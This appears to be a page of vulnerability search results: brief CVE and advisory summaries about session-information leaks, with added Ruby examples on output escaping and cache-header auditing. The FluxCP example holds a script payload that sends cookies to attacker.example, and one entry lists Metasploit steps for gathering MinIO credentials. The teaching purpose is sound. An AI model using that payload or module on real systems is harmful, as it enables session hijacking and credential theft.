12 matches found
CVE-2019-10528
Use after free issue in kernel while accessing freed mdlog session info and its attributes after closing the session in Snapdragon Auto, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables in MDM9206,...
CVE-2024-45799
Affected software: FluxCP web-based control panel for rAthena servers. Vulnerability: JavaScript injection via unsanitised content on venders/buyers list pages and shop names. Root cause / how it works: Unsanitised data in the shop-related pages allows injecting arbitrary JavaScript code that is...
CVE-2024-45799 Javascript Injection in Vending Info/Buyers Info Module in FluxCP
FluxCP is a web-based Control Panel for rAthena servers written in PHP. A JavaScript injection is possible via the venders/buyers list pages and shop names, which are currently not sanitized. This allows executing arbitrary JavaScript code in the user's browser just by visiting the shop pages. As a...
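The failure described in this entry is output encoding: a shop name controlled by a game client is dropped into the page markup verbatim. The snippet below is an added illustration written for this listing in Ruby, not FluxCP's PHP code; the shop name, the row markup and the function names are constructed for the example. It renders the same untrusted value once without escaping (the vulnerable pattern) and once through ERB::Util.html_escape (the fix), and checks whether a script tag survives to the browser.

```ruby
require "erb"
include ERB::Util # brings html_escape into scope

# Constructed test value standing in for a vendor's shop name: a payload that
# exfiltrates the session cookie. Not taken from any real FluxCP database.
SHOP_NAME = %q{Potions <script>location='https://attacker.example/?c='+document.cookie</script>}

# Vulnerable pattern: the value is interpolated into HTML unchanged, so the
# <script> element is parsed and executed by every browser that lists the shop.
def render_shop_row_unsafe(name)
  "<tr><td class=\"shop-name\">#{name}</td></tr>"
end

# Hardened pattern: escape at the point of output. html_escape turns < > & " '
# into entities, so the name is displayed as text and never parsed as markup.
def render_shop_row_safe(name)
  "<tr><td class=\"shop-name\">#{html_escape(name)}</td></tr>"
end

# Crude check used only to demonstrate the difference between the two renderers.
def contains_script_tag?(html)
  html.match?(/<script\b/i)
end

if __FILE__ == $PROGRAM_NAME
  puts render_shop_row_unsafe(SHOP_NAME)
  puts render_shop_row_safe(SHOP_NAME)
end
```

Escaping must happen for every untrusted field on the page (shop name, item names, seller name), not just the one that was reported; the list pages and the shop detail pages all need the same treatment.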
Information disclosure
Rails is a web-application framework. Starting with version 5.2.0, there is a possible sensitive session information leak in Active Storage. By default, Active Storage sends a Set-Cookie header along with the user's session cookie when serving blobs. It also sets Cache-Control to public. Certain...
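The dangerous combination in this entry is a response that both sets the session cookie and declares itself cacheable by shared caches. The check below is an added example for this listing, not Rails or Active Storage code; the response paths and header values are constructed. It scans a set of responses and flags any that carry Set-Cookie together with Cache-Control: public and no private/no-store directive, which is what lets an intermediate cache hand one user's session cookie to the next requester.

```ruby
# Constructed sample responses, as a proxy log or integration test might record
# them (path => headers). The first mimics the vulnerable Active Storage
# behaviour; the second is what a fixed response looks like; the third sets no cookie.
RESPONSES = {
  "/rails/active_storage/blobs/redirect/example-key/report.pdf" => {
    "Set-Cookie"    => "_app_session=abc123; path=/; HttpOnly",
    "Cache-Control" => "public, max-age=31536000",
  },
  "/rails/active_storage/blobs/redirect/example-key/photo.jpg" => {
    "Set-Cookie"    => "_app_session=abc123; path=/; HttpOnly",
    "Cache-Control" => "private, max-age=31536000",
  },
  "/assets/application.css" => {
    "Cache-Control" => "public, max-age=31536000",
  },
}

# True when a response carries a cookie and explicitly allows shared caching.
# Header names are compared case-insensitively; directives are split on commas.
def leaks_session_to_shared_cache?(headers)
  h = headers.transform_keys { |k| k.to_s.downcase }
  cookie = h["set-cookie"].to_s
  return false if cookie.empty?

  directives = h["cache-control"].to_s.downcase.split(",").map(&:strip)
  directives.include?("public") &&
    !directives.include?("private") &&
    !directives.include?("no-store")
end

# Returns the paths of every response that fails the check, in input order.
def audit(responses)
  responses.select { |_, hdrs| leaks_session_to_shared_cache?(hdrs) }.keys
end

if __FILE__ == $PROGRAM_NAME
  audit(RESPONSES).each { |path| puts "session cookie on cacheable response: #{path}" }
end
```

Run the same check against real traffic captured at the CDN or reverse proxy rather than at the application, since that is where the caching decision is actually made.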
Gather MinIO Client Key
This module searches for MinIO Client credentials on a Windows host.

Module Options

msf > use post/multi/gather/minio_client
msf post(minio_client) > show actions
    ...actions...
msf post(minio_client) > set ACTION < action-name >
msf post(minio_client) > show options
    ...show and set options...
msf post(minio_client) > run

This module...
AZL-37005 CVE-2021-3738 affecting package samba for versions less than 4.18.3-1
In DCE/RPC it is possible to share the handles (cookies for resource state) between multiple connections via a mechanism called 'association groups'. These handles can reference connections to our sam.ldb database. However, while the database was correctly shared, the user credentials state was only...
GHSA-GFP2-W5JM-955Q OMERO.web exposes some unnecessary session information in the page
Background OMERO.web loads various information about the current user such as their id, name and the groups they are in, and these are available on the main webclient pages. Some additional information being loaded is not used by the webclient and is being removed in this release. Impact OMERO.we...
Information disclosure
RSA Archer versions, prior to 6.5 SP1, contain an information exposure vulnerability. Users' session information is logged in plain text in the RSA Archer log files. An authenticated malicious local user with access to the log files may obtain the exposed information to use it in further attacks...
CVE-2012-0328
Janetter before 3.3.0.0 aka 3.3.0 allows remote attackers to obtain session information for twitter.com web sites via unspecified vectors...
WordPress 3.0.4 stored XSS vulnerability warning - Black Bar Safety Net
WordPress is a popular blogging platform developed in PHP. WordPress 3.0.4 contains a stored XSS vulnerability in its handling of comments; successful exploitation could leak session information, which may in turn lead to privilege escalation. In...
CVE-2009-1214
CVE-2009-1214 affects GNU screen 4.0.3, which creates the /tmp/screen-exchange temporary file with world-readable permissions, enabling local users to potentially obtain sensitive session information (confidentiality impact: COMPLETE). The issue is local, due to permissive file mode, and is corro...
CVE-2005-2149
config.php in Cacti 0.8.6e and earlier allows remote attackers to set the nohttpheaders switch, then modify session information to gain privileges and disable the use of addslashes to conduct SQL injection attacks...